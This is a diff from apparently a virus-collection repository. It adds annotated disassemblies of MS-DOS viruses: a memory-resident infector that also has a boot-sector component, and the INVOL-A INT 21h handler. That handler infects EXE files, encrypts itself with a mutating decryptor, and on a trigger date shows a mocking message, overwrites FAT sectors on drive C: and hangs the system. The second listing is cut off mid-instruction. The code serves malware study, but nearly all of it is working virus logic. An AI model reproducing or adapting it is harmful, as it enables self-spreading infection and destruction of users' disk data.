2E011E4200 ADD CS:[0042],BX +0B8B B3FF MOV BL,FF +0B8D B84342 MOV AX,4243 +0B90 CD21 INT 21 +0B92 3D7856 CMP AX,5678 +0B95 7513 JNZ 0BAA +0B97 07 POP ES +0B98 2E8E164200 MOV SS,CS:[0042] +0B9D 2E8B264000 MOV SP,CS:[0040] +0BA2 E8A8FE CALL 0A4D +0BA5 EA20202020 JMP 2020:2020 +0BAA E87DFE CALL 0A2A +0BAD E8AEFE CALL 0A5E +0BB0 33C0 XOR AX,AX +0BB2 8EC0 MOV ES,AX +0BB4 26A1F003 MOV AX,ES:[03F0] +0BB8 2EA31800 MOV CS:[0018],AX +0BBC 26A0F203 MOV AL,ES:[03F2] +0BC0 2EA21A00 MOV CS:[001A],AL +0BC4 26C706F003F3A5 MOV Word Ptr ES:[03F0],A5F3 ; 0:3F0 F3 A5 REPZ MOVSW +0BCB 26C606F203CB MOV Byte Ptr ES:[03F2],CB ; 0:3F2 CB RETF +0BD1 58 POP AX +0BD2 051000 ADD AX,0010 +0BD5 8EC0 MOV ES,AX +0BD7 0E PUSH CS +0BD8 1F POP DS +0BD9 B90010 MOV CX,1000 +0BDC D1E9 SHR CX,1 +0BDE 33F6 XOR SI,SI +0BE0 8BFE MOV DI,SI +0BE2 06 PUSH ES +0BE3 B8EC0B MOV AX,0BEC +0BE6 50 PUSH AX +0BE7 EAF0030000 JMP 0000:03F0 + +AX=0BEC BX=0E1A CX=0800 DX=2D4C SP=0DEA BP=0000 SI=0000 DI=0000 +DS= CS ES= CS SS= CS CS= CS IP=0BE7 NV UP EI PL ZR NA PE NC +;--------------------------------------------------------------------- +0BEC 8CC8 MOV AX,CS +0BEE 8ED0 MOV SS,AX +0BF0 BCEE0D MOV SP,0DEE +0BF3 33C0 XOR AX,AX +0BF5 8ED8 MOV DS,AX +0BF7 2EA11800 MOV AX,CS:[0018] +0BFB A3F003 MOV [03F0],AX +0BFE 2EA01A00 MOV AL,CS:[001A] +0C02 A2F203 MOV [03F2],AL +0C05 BB0010 MOV BX,1000 +0C08 B104 MOV CL,04 +0C0A D3EB SHR BX,CL +0C0C 83C340 ADD BX,+40 +0C0F B44A MOV AH,4A ; modifikuj alokovanou pamet +0C11 2E8E061600 MOV ES,CS:[0016] +0C16 CD21 INT 21 +0C18 B82135 MOV AX,3521 +0C1B CD21 INT 21 +0C1D 2E891EC506 MOV CS:[06C5],BX +0C22 2E8C06C706 MOV CS:[06C7],ES +0C27 0E PUSH CS +0C28 1F POP DS +0C29 BA9A06 MOV DX,069A +0C2C B82125 MOV AX,2521 +0C2F CD21 INT 21 +0C31 8E061600 MOV ES,[0016] +0C35 268E062C00 MOV ES,ES:[002C] +0C3A 33FF XOR DI,DI +0C3C B9FF7F MOV CX,7FFF +0C3F 32C0 XOR AL,AL +0C41 F2AE REPNZ SCASB +0C43 263805 CMP ES:[DI],AL +0C46 E0F9 LOOPNZ 0C41 +0C48 8BD7 MOV DX,DI +0C4A 83C203 ADD DX,+03 +0C4D B8004B MOV AX,4B00 +0C50 06 PUSH ES +0C51 1F POP DS +0C52 0E PUSH CS +0C53 07 POP ES +0C54 BB7000 MOV BX,0070 +0C57 1E PUSH DS +0C58 06 PUSH ES +0C59 50 PUSH AX +0C5A 53 PUSH BX +0C5B 51 PUSH CX +0C5C 52 PUSH DX +0C5D 0E PUSH CS +0C5E 1F POP DS +0C5F B80835 MOV AX,3508 +0C62 CD21 INT 21 +0C64 891ED902 MOV [02D9],BX +0C68 8C06DB02 MOV [02DB],ES +0C6C BAB302 MOV DX,02B3 +0C6F B80825 MOV AX,2508 +0C72 CD21 INT 21 +0C74 B80935 MOV AX,3509 +0C77 CD21 INT 21 +0C79 891EBA03 MOV [03BA],BX +0C7D 8C06BC03 MOV [03BC],ES +0C81 BA7303 MOV DX,0373 +0C84 B80925 MOV AX,2509 +0C87 CD21 INT 21 +0C89 B81335 MOV AX,3513 +0C8C CD21 INT 21 +0C8E 891E3406 MOV [0634],BX +0C92 8C063606 MOV [0636],ES +0C96 BAF004 MOV DX,04F0 +0C99 B81325 MOV AX,2513 +0C9C CD21 INT 21 +0C9E 5A POP DX +0C9F 59 POP CX +0CA0 5B POP BX +0CA1 58 POP AX +0CA2 07 POP ES +0CA3 1F POP DS +0CA4 9C PUSHF +0CA5 2EFF1EC506 CALL FAR CS:[06C5] +0CAA 1E PUSH DS +0CAB 07 POP ES +0CAC B449 MOV AH,49 +0CAE CD21 INT 21 +0CB0 B44D MOV AH,4D +0CB2 CD21 INT 21 +0CB4 B431 MOV AH,31 +0CB6 BA0010 MOV DX,1000 +0CB9 B104 MOV CL,04 +0CBB D3EA SHR DX,CL +0CBD 83C240 ADD DX,+40 +0CC0 CD21 INT 21 + +0CC0 00 00 00 00 00 00-00 00 00 00 00 00 00 00 +0CD0 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 + . + . + . +0DB0 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 +0DC0 00 00 00 00 00 00 F0 0C-FF 48 C5 48 57 18 06 00 ......p..HEHW... +0DD0 C5 48 00 00 00 00 C5 48-D5 48 00 00 EC 0B 59 09 EH....EHUH..l.Y. +0DE0 EC 0B 00 00 EC 0B 00 00-EC 0B D5 48 C0 3F 40 00 l...l...l.UH@?@. +0DF0 F5 19 73 0A F5 19 46 02-22 15 EC 0B 32 15 00 00 u.s.u.F.".l.2... + +;=========================================================================== +; BOOT virus +; +0000 E99C00 JMP 009F + +0000 E9 9C 00 4D 53 44 4F 53-34 2E 30 00 02 01 01 00 i..MSDOS4.0..... +0010 02 E0 00 40 0B F0 09 00-12 00 02 00 00 00 00 00 .`.@.p.......... +0020 00 00 00 00 00 00 29 DC-49 4F 20 20 20 20 20 20 ......)\IO +0030 53 59 53 4D 53 44 4F 53-20 20 20 53 59 53 CB 3C SYSMSDOS SYSK< +0040 FE FF FE FF 07 00 80 00-4E 6F 6E 2D 73 79 73 74 ~.~.....Non-syst +0050 65 6D 20 64 69 73 6B 20-6F 72 20 64 69 73 6B 20 em disk or disk +0060 65 72 72 6F 72 2E 0A 0D-52 65 70 6C 61 63 65 20 error...Replace +0070 61 6E 64 20 73 74 72 69-6B 65 20 61 6E 79 20 6B and strike any k +0080 65 79 20 77 68 65 6E 20-72 65 61 64 79 44 69 73 ey when readyDis +0090 6B 20 62 6F 6F 74 20 66-61 69 6C 75 72 65 2E k boot failure. + +009F B8006E MOV AX,6E00 +00A2 B104 MOV CL,04 +00A4 D3E8 SHR AX,CL +00A6 8CC9 MOV CX,CS +00A8 03C1 ADD AX,CX +00AA 8ED8 MOV DS,AX +00AC 8EC0 MOV ES,AX +00AE 8ED1 MOV SS,CX +00B0 BCF0FF MOV SP,FFF0 +00B3 1E PUSH DS +00B4 B8B90E MOV AX,0EB9 +00B7 50 PUSH AX +00B8 CB RETF + +;======================================================================= +; pokracovani po RETF - kod souvisly, zmena CS +; +0EB9 8816460E MOV [0E46],DL +0EBD 33C0 XOR AX,AX +0EBF 8ED8 MOV DS,AX +0EC1 A11304 MOV AX,[0413] ; velikost pameti v kB +0EC4 B106 MOV CL,06 +0EC6 D3E0 SHL AX,CL +0EC8 8ED8 MOV DS,AX ; prepocet na paragrafy +0ECA 833E400EFE CMP Word Ptr [0E40],-02 +0ECF 751A JNZ 0EEB +0ED1 B8520F MOV AX,0F52 +0ED4 1E PUSH DS +0ED5 50 PUSH AX +0ED6 1E PUSH DS +0ED7 07 POP ES +0ED8 BF000E MOV DI,0E00 +0EDB 33C0 XOR AX,AX +0EDD 8ED8 MOV DS,AX +0EDF BE007C MOV SI,7C00 +0EE2 B94000 MOV CX,0040 +0EE5 FA CLI +0EE6 FC CLD +0EE7 F3A4 REPZ MOVSB +0EE9 FB STI +0EEA CB RETF + +0EEB 33C0 XOR AX,AX +0EED 8ED8 MOV DS,AX +0EEF A11304 MOV AX,[0413] +0EF2 2D0500 SUB AX,0005 +0EF5 A31304 MOV [0413],AX +0EF8 B106 MOV CL,06 +0EFA D3E0 SHL AX,CL +0EFC 8ED8 MOV DS,AX +0EFE 8EC0 MOV ES,AX +0F00 2E8B16460E MOV DX,CS:[0E46] +0F05 33DB XOR BX,BX +0F07 2E8B0E440E MOV CX,CS:[0E44] +0F0C B80802 MOV AX,0208 +0F0F E8C800 CALL 0FDA +0F12 1E PUSH DS +0F13 B8180F MOV AX,0F18 +0F16 50 PUSH AX +0F17 CB RETF + +0F18 8816460E MOV [0E46],DL +0F1C 33C0 XOR AX,AX +0F1E 8ED8 MOV DS,AX +0F20 0E PUSH CS +0F21 07 POP ES +0F22 E839FB CALL 0A5E +0F25 2EC606740F00 MOV Byte Ptr CS:[0F74],00 +0F2B 90 NOP +0F2C 8CC9 MOV CX,CS +0F2E BFD902 MOV DI,02D9 ; definice preruseni 8 +0F31 BE2000 MOV SI,0020 +0F34 BA750F MOV DX,0F75 +0F37 E88500 CALL 0FBF +0F3A BE2400 MOV SI,0024 ; definice preruseni 9 +0F3D BFBA03 MOV DI,03BA +0F40 BA7303 MOV DX,0373 +0F43 E87900 CALL 0FBF +0F46 BE4C00 MOV SI,004C ; definice preruseni 13 +0F49 BF3406 MOV DI,0634 +0F4C BAF004 MOV DX,04F0 +0F4F E86D00 CALL 0FBF +0F52 1E PUSH DS +0F53 07 POP ES +0F54 C7068400FFFF MOV Word Ptr [0084],FFFF +0F5A BB007C MOV BX,7C00 +0F5D 2E8B0E440E MOV CX,CS:[0E44] +0F62 80C108 ADD CL,08 +0F65 2E8B16460E MOV DX,CS:[0E46] +0F6A B80102 MOV AX,0201 +0F6D E86A00 CALL 0FDA +0F70 1E PUSH DS +0F71 53 PUSH BX +0F72 CB RETF + +0F73 00 01 + +0F75 FA CLI +0F76 2E803E740F00 CMP Byte Ptr CS:[0F74],00 +0F7C 7404 JZ 0F82 +0F7E E932F3 JMP 02B3 + +0F82 1E PUSH DS +0F83 06 PUSH ES +0F84 50 PUSH AX +0F85 53 PUSH BX +0F86 51 PUSH CX +0F87 52 PUSH DX +0F88 56 PUSH SI +0F89 57 PUSH DI +0F8A 33C0 XOR AX,AX +0F8C 8ED8 MOV DS,AX +0F8E A18400 MOV AX,[0084] +0F91 3DFFFF CMP AX,FFFF +0F94 741E JZ 0FB4 +0F96 2E8006730F02 ADD Byte Ptr CS:[0F73],02 +0F9C 7316 JNB 0FB4 +0F9E 2EC606740F01 MOV Byte Ptr CS:[0F74],01 +0FA4 0E PUSH CS +0FA5 07 POP ES +0FA6 BE8400 MOV SI,0084 +0FA9 BFC506 MOV DI,06C5 +0FAC 8CC9 MOV CX,CS +0FAE BA9A06 MOV DX,069A +0FB1 E80B00 CALL 0FBF +0FB4 5F POP DI +0FB5 5E POP SI +0FB6 5A POP DX +0FB7 59 POP CX +0FB8 5B POP BX +0FB9 58 POP AX +0FBA 07 POP ES +0FBB 1F POP DS +0FBC E919F3 JMP 02D8 + +0FBF 1E PUSH DS +0FC0 50 PUSH AX +0FC1 33C0 XOR AX,AX +0FC3 8ED8 MOV DS,AX +0FC5 58 POP AX +0FC6 51 PUSH CX +0FC7 FC CLD +0FC8 B90200 MOV CX,0002 +0FCB F3A5 REPZ MOVSW +0FCD 59 POP CX +0FCE 83EE04 SUB SI,+04 +0FD1 FA CLI +0FD2 8914 MOV [SI],DX +0FD4 894C02 MOV [SI+02],CX +0FD7 FB STI +0FD8 1F POP DS +0FD9 C3 RET + +0FDA 56 PUSH SI +0FDB 8BF0 MOV SI,AX +0FDD CD13 INT 13 +0FDF 7308 JNB 0FE9 +0FE1 B400 MOV AH,00 +0FE3 CD13 INT 13 +0FE5 8BC6 MOV AX,SI +0FE7 EBF4 JMP 0FDD +0FE9 5E POP SI +0FEA C3 RET + +0FE0 08 B4 00 CD 13 8B C6 EB-F4 5E C3 00 00 00 00 00 .4.M..Fkt^C..... +0FF0 00 00 00 00 00 00 00 00-00 00 00 00 00 00 55 AA ..............U* + \ No newline at end of file diff --git a/MSDOS/Virus.MSDOS.Unknown.invol.asm b/MSDOS/Virus.MSDOS.Unknown.invol.asm new file mode 100644 index 00000000..98822dc8 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.invol.asm @@ -0,0 +1,563 @@ +; INVOL-A INT 21h handler Aug 26, 1992 +;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; + +0b59:0014 3d 00 4b cmp ax,4b00 +0b59:0017 74 03 jz 001c +0b59:0019 e9 7b 02 jmp ORIGINAL_21h (0297) + +0b59:001c 50 push ax +0b59:001d 53 push bx +0b59:001e 52 push dx +0b59:001f 1e push ds +0b59:0020 06 push es +0b59:0021 b8 02 3d mov ax,3d02 +0b59:0024 cd 21 int 21 +0b59:0026 73 03 jae 002b +0b59:0028 e9 67 02 jmp 0292 +0b59:002b 8b d8 mov bx,ax +0b59:002d 8c c8 mov ax,cs +0b59:002f 8e d8 mov ds,ax +0b59:0031 b4 3f mov ah,3f +0b59:0033 b9 18 00 mov cx,0018 +0b59:0036 ba 70 05 mov dx,0570 +0b59:0039 cd 21 int 21 +0b59:003b 72 4d jb 008a +0b59:003d 81 3e 70 05 4d + 5a cmp word [0570],5a4d +0b59:0043 75 45 jnz 008a +0b59:0045 b4 00 mov ah,00 +0b59:0047 cd 1a int 1a +0b59:0049 89 16 9d 02 mov [029d],dx +0b59:004d b8 02 42 mov ax,4202 +0b59:0050 b9 00 00 mov cx,0000 +0b59:0053 ba 00 00 mov dx,0000 +0b59:0056 cd 21 int 21 +0b59:0058 72 30 jb 008a +0b59:005a 89 16 6c 05 mov [056c],dx +0b59:005e a3 6e 05 mov [056e],ax +0b59:0061 2d 02 00 sub ax,0002 +0b59:0064 83 da 00 sbb dx,00 +0b59:0067 8b ca mov cx,dx +0b59:0069 8b d0 mov dx,ax +0b59:006b b8 00 42 mov ax,4200 +0b59:006e cd 21 int 21 +0b59:0070 72 18 jb 008a +0b59:0072 b9 02 00 mov cx,0002 +0b59:0075 ba 88 05 mov dx,0588 +0b59:0078 b4 3f mov ah,3f +0b59:007a cd 21 int 21 +0b59:007c 72 0c jb 008a +0b59:007e a1 82 05 mov ax,[0582] +0b59:0081 33 06 88 05 xor ax,[0588] +0b59:0085 3d 4a 4c cmp ax,4c4a +0b59:0088 75 03 jnz 008d +0b59:008a e9 01 02 jmp 028e +0b59:008d b4 2a mov ah,2a +0b59:008f cd 21 int 21 +0b59:0091 80 fa 13 cmp dl,13 +0b59:0094 74 03 jz DO_DAMAGE (0099) +0b59:0096 e9 b7 00 jmp 0150 +;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; +DO_DAMAGE: + +; first display the message below + +0b59:0099 b8 02 00 mov ax,0002 +0b59:009c cd 10 int 10 +0b59:009e ba b1 00 mov dx,00b1 +0b59:00a1 b4 09 mov ah,09 +0b59:00a3 cd 21 int 21 + +; then overwrite the first 10 sectors of FAT-1 on C: drive + +0b59:00a5 b0 02 mov al,02 +0b59:00a7 b9 0a 00 mov cx,000a +0b59:00aa ba 01 00 mov dx,0001 +0b59:00ad cd 26 int 26 + +; Hang the machine + +0b59:00af eb fe jmp 00af +;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; +0b59:00b1 59 6f 75 20 68 61 76 65 |You have| +0b59:00b9 20 68 65 6c 70 65 64 20 | helped | +0b59:00c1 73 70 72 65 61 64 20 74 |spread t| +0b59:00c9 68 69 73 20 76 69 72 75 |his viru| +0b59:00d1 73 2e 0d 0a 54 68 69 73 |s...This| +0b59:00d9 20 68 61 73 20 62 65 65 | has bee| +0b59:00e1 6e 20 61 20 6d 65 73 73 |n a mess| +0b59:00e9 61 67 65 20 66 72 6f 6d |age from| +0b59:00f1 20 79 6f 75 72 20 66 72 | your fr| +0b59:00f9 69 65 6e 64 6c 79 0d 0a |iendly..| +0b59:0101 6e 65 69 67 68 62 6f 72 |neighbor| +0b59:0109 68 6f 6f 64 20 69 6e 66 |hood inf| +0b59:0111 65 63 74 69 6f 6e 20 73 |ection s| +0b59:0119 65 72 76 69 63 65 2e 0d |ervice..| +0b59:0121 0a 54 68 61 6e 6b 20 79 |.Thank y| +0b59:0129 6f 75 20 66 6f 72 20 79 |ou for y| +0b59:0131 6f 75 72 20 69 6e 76 6f |our invo| +0b59:0139 6c 75 6e 74 61 72 79 20 |luntary | +0b59:0141 63 6f 6f 70 65 72 61 74 |cooperat| +0b59:0149 69 6f 6e 2e 0d 0a 24 |ion...$| +;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; +0b59:0150 a1 6e 05 mov ax,[056e] +0b59:0153 25 0f 00 and ax,000f +0b59:0156 75 0a jnz 0162 +0b59:0158 8b 16 6c 05 mov dx,[056c] +0b59:015c a1 6e 05 mov ax,[056e] +0b59:015f eb 1d jmp 017e +0b59:0161 90 nop + +0b59:0162 b2 10 mov dl,10 +0b59:0164 2a d0 sub dl,al +0b59:0166 b6 00 mov dh,00 +0b59:0168 01 16 6e 05 add [056e],dx +0b59:016c 83 16 6c 05 00 adc word [056c],00 +0b59:0171 b9 00 00 mov cx,0000 +0b59:0174 b8 02 42 mov ax,4202 +0b59:0177 cd 21 int 21 +0b59:0179 73 03 jae 017e +0b59:017b e9 10 01 jmp 028e + +0b59:017e b9 04 00 mov cx,0004 + +0b59:0181 d1 ea shr dx,1 +0b59:0183 d1 d8 rcr ax,1 +0b59:0185 e2 fa loop 0181 + +0b59:0187 2b 06 78 05 sub ax,[0578] +0b59:018b 01 06 7a 05 add [057a],ax +0b59:018f 8b 16 86 05 mov dx,[0586] +0b59:0193 89 16 a6 04 mov [04a6],dx +0b59:0197 8b 16 84 05 mov dx,[0584] +0b59:019b 89 16 a4 04 mov [04a4],dx +0b59:019f 8b 16 7e 05 mov dx,[057e] +0b59:01a3 89 16 9b 04 mov [049b],dx +0b59:01a7 8b 16 80 05 mov dx,[0580] +0b59:01ab 89 16 a0 04 mov [04a0],dx +0b59:01af a3 86 05 mov [0586],ax +0b59:01b2 c7 06 84 05 58 05 mov word [0584],0558 +0b59:01b8 05 5f 00 add ax,005f +0b59:01bb a3 7e 05 mov [057e],ax +0b59:01be c7 06 80 05 00 01 mov word [0580],0100 +0b59:01c4 a1 9d 02 mov ax,[029d] +0b59:01c7 a3 82 05 mov [0582],ax +0b59:01ca be 14 00 mov si,0014 +0b59:01cd 8c df mov di,ds +0b59:01cf 8e c7 mov es,di +0b59:01d1 bf 88 05 mov di,0588 +0b59:01d4 b9 ac 02 mov cx,02ac +0b59:01d7 8b 16 9d 02 mov dx,[029d] + +0b59:01db fc cld +0b59:01dc ad lodsw +0b59:01dd 33 c2 xor ax,dx +0b59:01df ab stosw +0b59:01e0 e2 fa loop 01dc + +0b59:01e2 be 9c 02 mov si,029c +0b59:01e5 d1 ea shr dx,1 +0b59:01e7 73 04 jae 01ed +0b59:01e9 c6 05 90 mov byte [di],90 +0b59:01ec 47 inc di +0b59:01ed a5 movs +0b59:01ee a5 movs +0b59:01ef a5 movs +0b59:01f0 b9 0a 00 mov cx,000a +0b59:01f3 83 f9 03 cmp cx,03 +0b59:01f6 75 02 jnz 01fa +0b59:01f8 8b ef mov bp,di +0b59:01fa d1 ea shr dx,1 +0b59:01fc 73 04 jae 0202 +0b59:01fe c6 05 90 mov byte [di],90 +0b59:0201 47 inc di +0b59:0202 a5 movsw +0b59:0203 e2 ee loop 01f3 +0b59:0205 b0 e2 mov al,e2 +0b59:0207 aa stosb +0b59:0208 2b ef sub bp,di +0b59:020a 4d dec bp +0b59:020b 8b c5 mov ax,bp +0b59:020d aa stosb +0b59:020e b0 e9 mov al,e9 +0b59:0210 aa stosb +0b59:0211 b8 a0 02 mov ax,02a0 +0b59:0214 2b c7 sub ax,di +0b59:0216 05 88 05 add ax,0588 +0b59:0219 ab stosw +0b59:021a b8 4a 4c mov ax,4c4a +0b59:021d 33 06 9d 02 xor ax,[029d] +0b59:0221 89 05 mov [di],ax +0b59:0223 83 c7 02 add di,02 +0b59:0226 81 ef 88 05 sub di,0588 +0b59:022a 8b cf mov cx,di +0b59:022c ba 88 05 mov dx,0588 +0b59:022f b4 40 mov ah,40 +0b59:0231 cd 21 int 21 +0b59:0233 72 59 jb 028e +0b59:0235 01 06 6e 05 add [056e],ax +0b59:0239 83 16 6c 05 00 adc word [056c],00 +0b59:023e 8b 16 6c 05 mov dx,[056c] +0b59:0242 a1 6e 05 mov ax,[056e] +0b59:0245 8a f2 mov dh,dl +0b59:0247 8a d4 mov dl,ah +0b59:0249 d1 ea shr dx,1 +0b59:024b b4 00 mov ah,00 +0b59:024d d0 d4 rcl ah,1 +0b59:024f 42 inc dx +0b59:0250 89 16 74 05 mov [0574],dx +0b59:0254 a3 72 05 mov [0572],ax +0b59:0257 8b 16 6c 05 mov dx,[056c] +0b59:025b a1 6e 05 mov ax,[056e] +0b59:025e b9 04 00 mov cx,0004 + +0b59:0261 d1 ea shr dx,1 +0b59:0263 d1 d8 rcr ax,1 +0b59:0265 e2 fa loop 0261 + +0b59:0267 2b 06 78 05 sub ax,[0578] +0b59:026b 29 06 7a 05 sub [057a],ax +0b59:026f 73 06 jae 0277 +0b59:0271 c7 06 7a 05 00 00 mov word [057a],0000 +0b59:0277 b9 00 00 mov cx,0000 +0b59:027a ba 00 00 mov dx,0000 +0b59:027d b8 00 42 mov ax,4200 +0b59:0280 cd 21 int 21 +0b59:0282 72 0a jb 028e +0b59:0284 b9 18 00 mov cx,0018 +0b59:0287 ba 70 05 mov dx,0570 +0b59:028a b4 40 mov ah,40 +0b59:028c cd 21 int 21 + +0b59:028e b4 3e mov ah,3e +0b59:0290 cd 21 int 21 +0b59:0292 07 pop es +0b59:0293 1f pop ds +0b59:0294 5a pop dx +0b59:0295 5b pop bx +0b59:0296 58 pop ax + +ORIGINAL_21h: + +0b59:0297 ea eb 40 19 00 jmp 0019:40eb + +0b59:029c ba c4 68 mov dx,68c4 +0b59:029f b9 ac 02 mov cx,02ac +0b59:02a2 8c dd mov bp,ds +0b59:02a4 8c c8 mov ax,cs +0b59:02a6 8e d8 mov ds,ax +0b59:02a8 8e c0 mov es,ax +0b59:02aa 33 f6 xor si,si +0b59:02ac 8b fe mov di,si + +0b59:02ae fc cld +0b59:02af 90 nop +0b59:02b0 ad lodsw +0b59:02b1 90 nop +0b59:02b2 33 c2 xor ax,dx +0b59:02b4 ab stosw +0b59:02b5 90 nop +0b59:02b6 8e dd mov ds,bp +0b59:02b8 be 80 00 mov si,0080 +0b59:02bb bf 66 05 mov di,0566 +0b59:02be b9 40 00 mov cx,0040 +0b59:02c1 f3 repz +0b59:02c2 a5 movsw +0b59:02c3 8c c0 mov ax,es +0b59:02c5 8e d8 mov ds,ax +0b59:02c7 8b c5 mov ax,bp +0b59:02c9 05 10 00 add ax,0010 +0b59:02cc 01 06 92 04 add [0492],ax +0b59:02d0 01 06 87 04 add [0487],ax + +; Hook INT 21h + +0b59:02d4 b8 00 00 mov ax,0000 +0b59:02d7 8e d8 mov ds,ax +0b59:02d9 c4 1e 84 00 les bx,[0084] +0b59:02dd 81 fb b6 0c cmp bx,0cb6 +0b59:02e1 75 14 jnz 02f7 +0b59:02e3 26 80 3f 9c cmp byte es:[bx],9c +0b59:02e7 75 0e jnz 02f7 +0b59:02e9 26 c4 06 c5 02 les ax,es:[02c5] +0b59:02ee fa cli +0b59:02ef a3 84 00 mov [0084],ax +0b59:02f2 8c 06 86 00 mov [0086],es +0b59:02f6 fb sti + +0b59:02f7 8c c8 mov ax,cs +0b59:02f9 8e d8 mov ds,ax +0b59:02fb 8e c0 mov es,ax +0b59:02fd b8 00 3d mov ax,3d00 +0b59:0300 ba 94 04 mov dx,0494 +0b59:0303 cd 21 int 21 +0b59:0305 72 79 jb 0380 +0b59:0307 8b d8 mov bx,ax +0b59:0309 ba f0 06 mov dx,06f0 +0b59:030c b9 00 04 mov cx,0400 +0b59:030f b4 3f mov ah,3f +0b59:0311 cd 21 int 21 +0b59:0313 72 6e jb 0383 +0b59:0315 8b c8 mov cx,ax +0b59:0317 a3 78 05 mov [0578],ax +0b59:031a be f0 06 mov si,06f0 + + +0b59:031d ac lodsb +0b59:031e 3c 44 cmp al,44 ; 'D' +0b59:0320 74 06 jz 0328 +0b59:0322 3c 64 cmp al,64 ; 'd' +0b59:0324 e0 f7 loopnz 031d + +0b59:0326 e3 5e jcxz 0386 + +0b59:0328 bf a2 04 mov di,04a2 + +0b59:032b ac lodsb +0b59:032c 3c 61 cmp al,61 ; 'a' +0b59:032e 72 02 jb 0332 +0b59:0330 2c 20 sub al,20 +0b59:0332 ae scasb +0b59:0333 e1 f6 loopz 032b +0b59:0335 e3 4f jcxz 0386 + +0b59:0337 81 ff a8 04 cmp di,04a8 +0b59:033b e0 e0 loopnz 031d +0b59:033d 8b fe mov di,si +0b59:033f 4f dec di +0b59:0340 b0 3d mov al,3d +0b59:0342 f2 repnz +0b59:0343 ae scasb +0b59:0344 b0 41 mov al,41 +0b59:0346 ae scasb +0b59:0347 77 fd ja 0346 +0b59:0349 8b f7 mov si,di +0b59:034b b0 20 mov al,20 +0b59:034d ae scasb +0b59:034e 72 fd jb 034d +0b59:0350 c6 45 ff 00 mov byte [-01+di],00 +0b59:0354 8b fe mov di,si +0b59:0356 83 ef 04 sub di,04 +0b59:0359 80 3c 3a cmp byte [si],3a ; ':' +0b59:035c 74 04 jz 0362 +0b59:035e 4e dec si +0b59:035f eb 05 jmp 0366 +0b59:0361 90 nop + +0b59:0362 83 c7 02 add di,02 +0b59:0365 46 inc si +0b59:0366 80 3c 5c cmp byte [si],5c ; '\' +0b59:0369 75 01 jnz 036c +0b59:036b 47 inc di + +0b59:036c 8b d7 mov dx,di +0b59:036e be a8 04 mov si,04a8 +0b59:0371 b9 03 00 mov cx,0003 +0b59:0374 f3 repz +0b59:0375 a4 movsb +0b59:0376 b8 02 3d mov ax,3d02 +0b59:0379 cd 21 int 21 +0b59:037b 72 09 jb 0386 +0b59:037d e9 92 00 jmp 0412 +0b59:0380 e9 07 01 jmp 048a +0b59:0383 e9 00 01 jmp 0486 + +0b59:0386 b4 3e mov ah,3e +0b59:0388 cd 21 int 21 +0b59:038a 72 f4 jb 0380 +0b59:038c b8 02 3d mov ax,3d02 +0b59:038f cd 21 int 21 +0b59:0391 72 ed jb 0380 +0b59:0393 8b d8 mov bx,ax +0b59:0395 b4 3f mov ah,3f +0b59:0397 b9 ff ff mov cx,ffff +0b59:039a ba 02 07 mov dx,0702 +0b59:039d cd 21 int 21 +0b59:039f 72 e2 jb 0383 +0b59:03a1 bf f0 06 mov di,06f0 +0b59:03a4 be b5 04 mov si,04b5 +0b59:03a7 b9 12 00 mov cx,0012 +0b59:03aa f3 repz +0b59:03ab a4 movsb +0b59:03ac b8 00 42 mov ax,4200 +0b59:03af b9 00 00 mov cx,0000 +0b59:03b2 ba 00 00 mov dx,0000 +0b59:03b5 cd 21 int 21 +0b59:03b7 72 ca jb 0383 +0b59:03b9 8b 0e 78 05 mov cx,[0578] +0b59:03bd 83 c1 12 add cx,12 +0b59:03c0 90 nop +0b59:03c1 ba f0 06 mov dx,06f0 +0b59:03c4 b4 40 mov ah,40 +0b59:03c6 cd 21 int 21 +0b59:03c8 72 b9 jb 0383 +0b59:03ca b4 3e mov ah,3e +0b59:03cc cd 21 int 21 +0b59:03ce 72 b0 jb 0380 +0b59:03d0 b8 13 80 mov ax,8013 +0b59:03d3 a3 52 05 mov [0552],ax +0b59:03d6 b8 14 00 mov ax,0014 +0b59:03d9 a3 ff 04 mov [04ff],ax +0b59:03dc b8 23 00 mov ax,0023 +0b59:03df a3 04 05 mov [0504],ax +0b59:03e2 b9 04 00 mov cx,0004 +0b59:03e5 be c8 04 mov si,04c8 +0b59:03e8 bf 58 05 mov di,0558 +0b59:03eb f3 repz +0b59:03ec a5 movs +0b59:03ed be d0 04 mov si,04d0 +0b59:03f0 bf 04 07 mov di,0704 +0b59:03f3 b9 21 00 mov cx,0021 +0b59:03f6 f3 repz +0b59:03f7 a5 movs +0b59:03f8 b4 3c mov ah,3c +0b59:03fa b9 02 00 mov cx,0002 +0b59:03fd ba a8 04 mov dx,04a8 +0b59:0400 cd 21 int 21 +0b59:0402 73 03 jae 0407 +0b59:0404 e9 83 00 jmp 048a +0b59:0407 8b d8 mov bx,ax +0b59:0409 c7 06 62 05 42 + 00 mov word [0562],0042 +0b59:040f eb 4c jmp 045d +0b59:0411 90 nop +;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; +0b59:0412 8b c8 mov cx,ax +0b59:0414 b4 3e mov ah,3e +0b59:0416 cd 21 int 21 +0b59:0418 8b d9 mov bx,cx +0b59:041a 72 6a jb 0486 +0b59:041c ba f0 06 mov dx,06f0 +0b59:041f b9 ff ff mov cx,ffff +0b59:0422 b4 3f mov ah,3f +0b59:0424 cd 21 int 21 +0b59:0426 72 5e jb 0486 +0b59:0428 a3 62 05 mov [0562],ax +0b59:042b a1 02 07 mov ax,[0702] +0b59:042e 3d 4a 4c cmp ax,4c4a +0b59:0431 74 53 jz 0486 +0b59:0433 a1 f6 06 mov ax,[06f6] +0b59:0436 a3 ff 04 mov [04ff],ax +0b59:0439 a1 f8 06 mov ax,[06f8] +0b59:043c a3 04 05 mov [0504],ax +0b59:043f a1 f4 06 mov ax,[06f4] +0b59:0442 a3 52 05 mov [0552],ax +0b59:0445 b9 04 00 mov cx,0004 +0b59:0448 be 